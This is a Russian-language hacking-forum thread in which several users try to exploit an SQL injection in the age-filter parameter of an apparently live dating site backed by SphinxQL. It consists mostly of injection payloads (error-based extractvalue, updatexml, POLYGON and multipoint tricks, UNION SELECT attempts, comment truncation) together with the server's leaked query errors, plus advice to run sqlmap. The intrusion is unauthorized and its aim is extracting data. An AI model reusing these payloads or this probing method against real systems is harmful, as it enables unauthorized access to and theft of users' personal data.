Скул на SphinXQL

[YuNi|[c]

Цитата:

Сообщение от profexer

Может он вовсе и не игнорит? Если нет ошибки, то где-то же выводится id пользователя (в ссылке или например его имя, по которому можно получить id) или наоборот вся инфа пропадает.

выводится в формате json
{"data":{"items":[{"id":868294,"blablalblaaaaaa

убрал a[ageTo]=90 параметр и получил имена колонок:

Код:

a[ageFrom]=18 AND age <= 90 AND id_partner != 3 ORDER BY rand() LIMIT 10,2/*

Код:

Integrity constraint violation.
SQLSTATE[23000]: Integrity constraint violation: 1048 Column 'age_to' cannot be null
The SQL being executed was: INSERT INTO `x27_users_search` (`id_user`, `age_from`, `age_to`, `date_created`) VALUES (1273490, 18, NULL, CURRENT_TIMESTAMP())

[profexer]

Что происходит с теми запросами, которые не вызывают ошибки? Информация просто не выводится или что?

Теперь понятно - данные используются в следующем запросе.
Теперь нужно подобрать параметры таким образом, чтоб нормальный результат отдал 1 строку, а потом к запросу приклеить наши данные и сделать лимит начиная с нашей второй строки.

[YuNi|[c]

Цитата:

Сообщение от profexer

Что происходит с теми запросами, которые не вызывают ошибки? Информация просто не выводится или что?

к приверу этот идет без ошибок и данные выводится в json

Код:

a[ageFrom]=18 AND age <= 97 AND id_partner != 3 ORDER BY rand() LIMIT 10,2/*

и limit работает

[profexer]

Или чтоб не подбирать параметры, можно узнать сколько всего строк удовлетворяет условию и сделать лимит только нашей.

[YuNi|[c]

Цитата:

Сообщение от profexer

Или чтоб не подбирать параметры, можно узнать сколько всего строк удовлетворяет условию и сделать лимит только нашей.

насчет строки выше сказал там ответ в json.
В запросе много параметров с пустым значением и я убрал их всех и оставил только 5 параметров которые влияет на ответ.

Вот пробовал Error Based варианты:

Код:

18+OR+1+GROUP+BY+CONCAT_WS(0x3a,VERSION(),FLOOR(RAND(0)*2))+HAVING+MIN(0)+OR+1/*

Код:

Database Exception.
SQLSTATE[42000]: Syntax error or access violation: 1064 sphinxql: syntax error, unexpected OR, expecting $end near 'OR 1 GROUP BY CONCAT_WS(0x3a,VERSION(),FLOOR(RAND(0)*2)) HAVING MIN(0) OR 1/* AND age <= 90 AND id_partner != 3 ORDER BY rand() LIMIT 100000 OPTION max_matches = 100000;'
The SQL being executed was: SELECT `id_user`, is_online FROM profiles_female WHERE can_receive_gift = 1 AND id_mirror = 20 AND is_blocked = 0 AND age >= 18 OR 1 GROUP BY CONCAT_WS(0x3a,VERSION(),FLOOR(RAND(0)*2)) HAVING MIN(0) OR 1/* AND age <= 90 AND id_partner != 3 ORDER BY rand() LIMIT 100000 OPTION max_matches = 100000;

Код:

18 and extractvalue(0x0a,concat(0x0a,(select version())))/*

Код:

Database Exception.
SQLSTATE[42000]: Syntax error or access violation: 1064 sphinxql: syntax error, unexpected '(', expecting BETWEEN (or 9 other tokens) near '(0x0a,concat(0x0a,(select version())))/* AND age <= 90 AND id_partner != 3 ORDER BY rand() LIMIT 100000 OPTION max_matches = 100000;'
The SQL being executed was: SELECT `id_user`, is_online FROM profiles_female WHERE can_receive_gift = 1 AND id_mirror = 20 AND is_blocked = 0 AND age >= 18 and extractvalue(0x0a,concat(0x0a,(select version())))/* AND age <= 90 AND id_partner != 3 ORDER BY rand() LIMIT 100000 OPTION max_matches = 100000;

Код:

18 and updatexml(null,concat(0x0a,(select version())),null)/*

Код:

Database Exception.
SQLSTATE[42000]: Syntax error or access violation: 1064 sphinxql: syntax error, unexpected '(', expecting BETWEEN (or 9 other tokens) near '(null,concat(0x0a,(select version())),null)/* AND age <= 90 AND id_partner != 3 ORDER BY rand() LIMIT 100000 OPTION max_matches = 100000;'
The SQL being executed was: SELECT `id_user`, is_online FROM profiles_female WHERE can_receive_gift = 1 AND id_mirror = 20 AND is_blocked = 0 AND age >= 18 and updatexml(null,concat(0x0a,(select version())),null)/* AND age <= 90 AND id_partner != 3 ORDER BY rand() LIMIT 100000 OPTION max_matches = 100000;

Код:

18+POLYGON((Select*from(Select*from(Select+@@version ``)y)x))/*

Код:

Database Exception.
SQLSTATE[42000]: Syntax error or access violation: 1064 sphinxql: syntax error, unexpected IDENT, expecting $end near 'POLYGON((Select*from(Select*from(Select @@version ``)y)x))/* AND age <= 90 AND id_partner != 3 ORDER BY rand() LIMIT 100000 OPTION max_matches = 100000;'
The SQL being executed was: SELECT `id_user`, is_online FROM profiles_female WHERE can_receive_gift = 1 AND id_mirror = 20 AND is_blocked = 0 AND age >= 18 POLYGON((Select*from(Select*from(Select @@version ``)y)x))/* AND age <= 90 AND id_partner != 3 ORDER BY rand() LIMIT 100000 OPTION max_matches = 100000;

Код:

18+multipoint((select*from+(select+x*1E308+from+(select+concat(@:=0,(select+count(*)+from+information_schema.tables+where+table_schema=database()+and@:=concat(@,0x0b,table_name)),@)x)y)j))/*

Код:

Database Exception.
SQLSTATE[42000]: Syntax error or access violation: 1064 sphinxql: syntax error, unexpected IDENT, expecting $end near 'multipoint((select*from (select x*1E308 from (select concat(@:=0,(select count(*) from information_schema.tables where table_schema=database() and@:=concat(@,0x0b,table_name)),@)x)y)j))/* AND age <= 90 AND id_partner != 3 ORDER BY rand() LIMIT 100000 OPTION max_matches = 100000;'
The SQL being executed was: SELECT `id_user`, is_online FROM profiles_female WHERE can_receive_gift = 1 AND id_mirror = 20 AND is_blocked = 0 AND age >= 18 multipoint((select*from (select x*1E308 from (select concat(@:=0,(select count(*) from information_schema.tables where table_schema=database() and@:=concat(@,0x0b,table_name)),@)x)y)j))/* AND age <= 90 AND id_partner != 3 ORDER BY rand() LIMIT 100000 OPTION max_matches = 100000;

Код:

18+multipoint((select*from(select(!x-~0)+from(select+concat(@:=0,(select(count(*))from(information_schema.tables)where(table_schema=database())and@:=concat(@,0x0b,table_name)),@)x)y)j))/*

Код:

Database Exception.
SQLSTATE[42000]: Syntax error or access violation: 1064 sphinxql: syntax error, unexpected IDENT, expecting $end near 'multipoint((select*from(select(!x-~0) from(select concat(@:=0,(select(count(*))from(information_schema.tables)where(table_schema=database())and@:=concat(@,0x0b,table_name)),@)x)y)j))/* AND age <= 90 AND id_partner != 3 ORDER BY rand() LIMIT 100000 OPTION max_matches = 100000;'
The SQL being executed was: SELECT `id_user`, is_online FROM profiles_female WHERE can_receive_gift = 1 AND id_mirror = 20 AND is_blocked = 0 AND age >= 18 multipoint((select*from(select(!x-~0) from(select concat(@:=0,(select(count(*))from(information_schema.tables)where(table_schema=database())and@:=concat(@,0x0b,table_name)),@)x)y)j))/* AND age <= 90 AND id_partner != 3 ORDER BY rand() LIMIT 100000 OPTION max_matches = 100000;

Код:

18 and(select!x-~0.+from(select(select+group_concat(Version()))x)x)/*

Код:

Database Exception.
SQLSTATE[42000]: Syntax error or access violation: 1064 sphinxql: syntax error, unexpected SELECT, expecting IDENT (or 97 other tokens) near 'select!x-~0. from(select(select group_concat(Version()))x)x)/* AND age <= 90 AND id_partner != 3 ORDER BY rand() LIMIT 100000 OPTION max_matches = 100000;'
The SQL being executed was: SELECT `id_user`, is_online FROM profiles_female WHERE can_receive_gift = 1 AND id_mirror = 20 AND is_blocked = 0 AND age >= 18 and(select!x-~0. from(select(select group_concat(Version()))x)x)/* AND age <= 90 AND id_partner != 3 ORDER BY rand() LIMIT 100000 OPTION max_matches = 100000;

Код:

(select+x*1E308+from(select+concat(@:=0,(select+count(*)from+information_schema.tables+where+table_schema=database()and@:=concat(@,0x0b,table_name)),@)x)y)/*

Код:

Database Exception.
SQLSTATE[42000]: Syntax error or access violation: 1064 sphinxql: syntax error, unexpected '(', expecting CONST_INT (or 3 other tokens) near '(select x*1E308 from(select concat(@:=0,(select count(*)from information_schema.tables where table_schema=database()and@:=concat(@,0x0b,table_name)),@)x)y)/* AND age <= 90 AND id_partner != 3 ORDER BY rand() LIMIT 100000 OPTION max_matches = 100000;'
The SQL being executed was: SELECT `id_user`, is_online FROM profiles_female WHERE can_receive_gift = 1 AND id_mirror = 20 AND is_blocked = 0 AND age >= (select x*1E308 from(select concat(@:=0,(select count(*)from information_schema.tables where table_schema=database()and@:=concat(@,0x0b,table_name)),@)x)y)/* AND age <= 90 AND id_partner != 3 ORDER BY rand() LIMIT 100000 OPTION max_matches = 100000;

Код:

18 and(select+x*1E308+from(select+concat(@:=0,(select+count(*)from+information_schema.tables+where+table_schema=database()+and@:=concat(@,0x0b,table_name)),@)x)y)/*

Код:

Database Exception.
SQLSTATE[42000]: Syntax error or access violation: 1064 sphinxql: syntax error, unexpected SELECT, expecting IDENT (or 97 other tokens) near 'select x*1E308 from(select concat(@:=0,(select count(*)from information_schema.tables where table_schema=database() and@:=concat(@,0x0b,table_name)),@)x)y)/* AND age <= 90 AND id_partner != 3 ORDER BY rand() LIMIT 100000 OPTION max_matches = 100000;'
The SQL being executed was: SELECT `id_user`, is_online FROM profiles_female WHERE can_receive_gift = 1 AND id_mirror = 20 AND is_blocked = 0 AND age >= 18 and(select x*1E308 from(select concat(@:=0,(select count(*)from information_schema.tables where table_schema=database() and@:=concat(@,0x0b,table_name)),@)x)y)/* AND age <= 90 AND id_partner != 3 ORDER BY rand() LIMIT 100000 OPTION max_matches = 100000;

Код:

18+AND(SELECT+1+FROM(SELECT+COUNT(*),CONCAT((SELECT+(SELECT+CONCAT(CAST(VERSION()+AS+CHAR),0x7e))+FROM+INFORMATION_SCHEMA.TABLES+LIMIT+0,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)+AND+1=1/*

Код:

Database Exception.
SQLSTATE[42000]: Syntax error or access violation: 1064 sphinxql: syntax error, unexpected SELECT, expecting IDENT (or 97 other tokens) near 'SELECT 1 FROM(SELECT COUNT(*),CONCAT((SELECT (SELECT CONCAT(CAST(VERSION() AS CHAR),0x7e)) FROM INFORMATION_SCHEMA.TABLES LIMIT 0,1),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.TABLES GROUP BY x)a) AND 1=1/* AND age <= 90 AND id_partner != 3 ORDER BY rand() LIMIT 100000 OPTION max_matches = 100000;'
The SQL being executed was: SELECT `id_user`, is_online FROM profiles_female WHERE can_receive_gift = 1 AND id_mirror = 20 AND is_blocked = 0 AND age >= 18 AND(SELECT 1 FROM(SELECT COUNT(*),CONCAT((SELECT (SELECT CONCAT(CAST(VERSION() AS CHAR),0x7e)) FROM INFORMATION_SCHEMA.TABLES LIMIT 0,1),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.TABLES GROUP BY x)a) AND 1=1/* AND age <= 90 AND id_partner != 3 ORDER BY rand() LIMIT 100000 OPTION max_matches = 100000;

[profexer]

Цель такая - приклеить к выборке наши данные через UNION и вывести их. Для этого, в первую очередь, нужно корректно завершить запрос. А потом добиться вывода приклеенных данных. Вывода можно добиться либо указав невыполнимое условие для первой выборки, либо указать условия, которые выдадут только одну строку, либо узнать сколько строк возвращает первая выборка и вывести только последнюю.

Что отдают запросы которые я постил?

Цитата:

18 AND is_online=-1 UNION SELECT 1, 2 LIMIT 0,1/*

Цитата:

18 AND `id_user`=-1 UNION SELECT 1, 2 LIMIT 0,1/*

Цитата:

18 AND `id_user`=-1 UNION SELECT `1` as id_user, `2` as is_online LIMIT 0,1/*

[YuNi|[c]

Цитата:

Сообщение от profexer

Нужно понимать, что это совершенно другая СУБД, которая только частично поддерживает синтаксис MySQL, так что Error Based для нее нужно искать отдельно. И SphinXQL вроде как не поддерживает подзапросы, так что...

Цель такая - приклеить к выборке наши данные через UNION и вывести их. Для этого, в первую очередь, нужно корректно завершить запрос. А потом добиться вывода приклеенных данных. Вывода можно добиться либо указав невыполнимое условие для первой выборки, либо указать условия, которые выдадут только одну строку, либо узнать сколько строк возвращает первая выборка и вывести только последнюю.

Что отдают запросы которые я постил?

вот ответ

Код:

18 AND is_online=-1 UNION SELECT 1, 2 LIMIT 0,1/*

Цитата:

Database Exception.
SQLSTATE[42000]: Syntax error or access violation: 1064 sphinxql: syntax error, unexpected IDENT, expecting $end near 'UNION SELECT 1, 2 LIMIT 0,1/* AND age <= 90 AND id_partner != 3 ORDER BY rand() LIMIT 100000 OPTION max_matches = 100000;'
The SQL being executed was: SELECT `id_user`, is_online FROM profiles_female WHERE can_receive_gift = 1 AND id_mirror = 20 AND is_blocked = 0 AND age >= 18 AND is_online=-1 UNION SELECT 1, 2 LIMIT 0,1/* AND age <= 90 AND id_partner != 3 ORDER BY rand() LIMIT 100000 OPTION max_matches = 100000;

Код:

18 AND `id_user`=-1 UNION SELECT 1, 2 LIMIT 0,1/*

Цитата:

Database Exception.
SQLSTATE[42000]: Syntax error or access violation: 1064 sphinxql: syntax error, unexpected IDENT, expecting $end near 'UNION SELECT 1, 2 LIMIT 0,1/* AND age <= 90 AND id_partner != 3 ORDER BY rand() LIMIT 100000 OPTION max_matches = 100000;'
The SQL being executed was: SELECT `id_user`, is_online FROM profiles_female WHERE can_receive_gift = 1 AND id_mirror = 20 AND is_blocked = 0 AND age >= 18 AND `id_user`=-1 UNION SELECT 1, 2 LIMIT 0,1/* AND age <= 90 AND id_partner != 3 ORDER BY rand() LIMIT 100000 OPTION max_matches = 100000;

Код:

18 AND `id_user`=-1 UNION SELECT `1` as id_user, `2` as is_online LIMIT 0,1/*

Цитата:

Database Exception.
SQLSTATE[42000]: Syntax error or access violation: 1064 sphinxql: syntax error, unexpected IDENT, expecting $end near 'UNION SELECT `1` as id_user, `2` as is_online LIMIT 0,1/* AND age <= 90 AND id_partner != 3 ORDER BY rand() LIMIT 100000 OPTION max_matches = 100000;'
The SQL being executed was: SELECT `id_user`, is_online FROM profiles_female WHERE can_receive_gift = 1 AND id_mirror = 20 AND is_blocked = 0 AND age >= 18 AND `id_user`=-1 UNION SELECT `1` as id_user, `2` as is_online LIMIT 0,1/* AND age <= 90 AND id_partner != 3 ORDER BY rand() LIMIT 100000 OPTION max_matches = 100000;

[profexer]

Цитата:

18 LIMIT 0,2/*
18 AND `id_user` = -1 LIMIT 0,2/*
18 AND is_online = -1 LIMIT 0,2/*
18 UNION SELECT 1, 2 LIMIT 0,2/*
18 UNION SELECT `1`, `2` LIMIT 0,2/*
18 UNION SELECT '1', '2' LIMIT 0,2/*
18 UNION SELECT 1 as id_user, 2 as is_online LIMIT 0,2/*
18 UNION SELECT `1` as id_user, `2` as is_online LIMIT 0,2/*
18 UNION SELECT '1' as id_user, '2' as is_online LIMIT 0,2/*

Методом научного тыка будем искать ошибку синтаксиса =D

[HeartLESS]

Судя по ошибке, он хочет чтобы ты закрыл запрос.
Кстати, натрави sqlmap с error based векторами для всех субд. А там stacked query нет?

[YuNi|[c]

Цитата:

Сообщение от HeartLESS

Судя по ошибке, он хочет чтобы ты закрыл запрос.
Кстати, натрави sqlmap с error based векторами для всех субд. А там stacked query нет?

да вот и не можем закончит запрос бро.
Нет stacked не обнаружен. Думал натравит на Netsparker именно этот запрос и если найдет скул там можно юзат его круталку, но нет никакой сканер не видит тут скули.

Вот profexer запрос ответ:
1.

Код:

18 LIMIT 0,2/*

без ошибок ответ с данными в JSON
2.

Код:

18 AND `id_user` = -1 LIMIT 0,2/*

без ошибок но без данных

Цитата:

{"data":{"items":[],"count":0,"track":null}}

3.

Код:

18 AND is_online = -1 LIMIT 0,2/*

без ошибок но без данных

Цитата:

{"data":{"items":[],"count":0,"track":null}}

4.

Код:

18 AND is_online = -1 LIMIT 0,2/*

без ошибок но без данных

Цитата:

{"data":{"items":[],"count":0,"track":null}}

5.

Код:

18 UNION SELECT 1, 2 LIMIT 0,2/*

Цитата:

Database Exception.
SQLSTATE[42000]: Syntax error or access violation: 1064 sphinxql: syntax error, unexpected IDENT, expecting $end near 'UNION SELECT 1, 2 LIMIT 0,2/* AND age <= 90 AND id_partner != 3 ORDER BY rand() LIMIT 100000 OPTION max_matches = 100000;'
The SQL being executed was: SELECT `id_user`, is_online FROM profiles_female WHERE can_receive_gift = 1 AND id_mirror = 20 AND is_blocked = 0 AND age >= 18 UNION SELECT 1, 2 LIMIT 0,2/* AND age <= 90 AND id_partner != 3 ORDER BY rand() LIMIT 100000 OPTION max_matches = 100000;

5.

Код:

18 UNION SELECT `1`, `2` LIMIT 0,2/*

Цитата:

Database Exception.
SQLSTATE[42000]: Syntax error or access violation: 1064 sphinxql: syntax error, unexpected IDENT, expecting $end near 'UNION SELECT `1`, `2` LIMIT 0,2/* AND age <= 90 AND id_partner != 3 ORDER BY rand() LIMIT 100000 OPTION max_matches = 100000;'
The SQL being executed was: SELECT `id_user`, is_online FROM profiles_female WHERE can_receive_gift = 1 AND id_mirror = 20 AND is_blocked = 0 AND age >= 18 UNION SELECT `1`, `2` LIMIT 0,2/* AND age <= 90 AND id_partner != 3 ORDER BY rand() LIMIT 100000 OPTION max_matches = 100000;

6.

Код:

18 UNION SELECT '1', '2' LIMIT 0,2/*

Цитата:

Database Exception.
SQLSTATE[42000]: Syntax error or access violation: 1064 sphinxql: syntax error, unexpected IDENT, expecting $end near 'UNION SELECT '1', '2' LIMIT 0,2/* AND age <= 90 AND id_partner != 3 ORDER BY rand() LIMIT 100000 OPTION max_matches = 100000;'
The SQL being executed was: SELECT `id_user`, is_online FROM profiles_female WHERE can_receive_gift = 1 AND id_mirror = 20 AND is_blocked = 0 AND age >= 18 UNION SELECT '1', '2' LIMIT 0,2/* AND age <= 90 AND id_partner != 3 ORDER BY rand() LIMIT 100000 OPTION max_matches = 100000;

7.

Код:

18 UNION SELECT 1 as id_user, 2 as is_online LIMIT 0,2/*

Цитата:

Database Exception.
SQLSTATE[42000]: Syntax error or access violation: 1064 sphinxql: syntax error, unexpected IDENT, expecting $end near 'UNION SELECT 1 as id_user, 2 as is_online LIMIT 0,2/* AND age <= 90 AND id_partner != 3 ORDER BY rand() LIMIT 100000 OPTION max_matches = 100000;'
The SQL being executed was: SELECT `id_user`, is_online FROM profiles_female WHERE can_receive_gift = 1 AND id_mirror = 20 AND is_blocked = 0 AND age >= 18 UNION SELECT 1 as id_user, 2 as is_online LIMIT 0,2/* AND age <= 90 AND id_partner != 3 ORDER BY rand() LIMIT 100000 OPTION max_matches = 100000;

8.

Код:

18 UNION SELECT `1` as id_user, `2` as is_online LIMIT 0,2/*

Database Exception.

Цитата:

SQLSTATE[42000]: Syntax error or access violation: 1064 sphinxql: syntax error, unexpected IDENT, expecting $end near 'UNION SELECT `1` as id_user, `2` as is_online LIMIT 0,2/* AND age <= 90 AND id_partner != 3 ORDER BY rand() LIMIT 100000 OPTION max_matches = 100000;'
The SQL being executed was: SELECT `id_user`, is_online FROM profiles_female WHERE can_receive_gift = 1 AND id_mirror = 20 AND is_blocked = 0 AND age >= 18 UNION SELECT `1` as id_user, `2` as is_online LIMIT 0,2/* AND age <= 90 AND id_partner != 3 ORDER BY rand() LIMIT 100000 OPTION max_matches = 100000;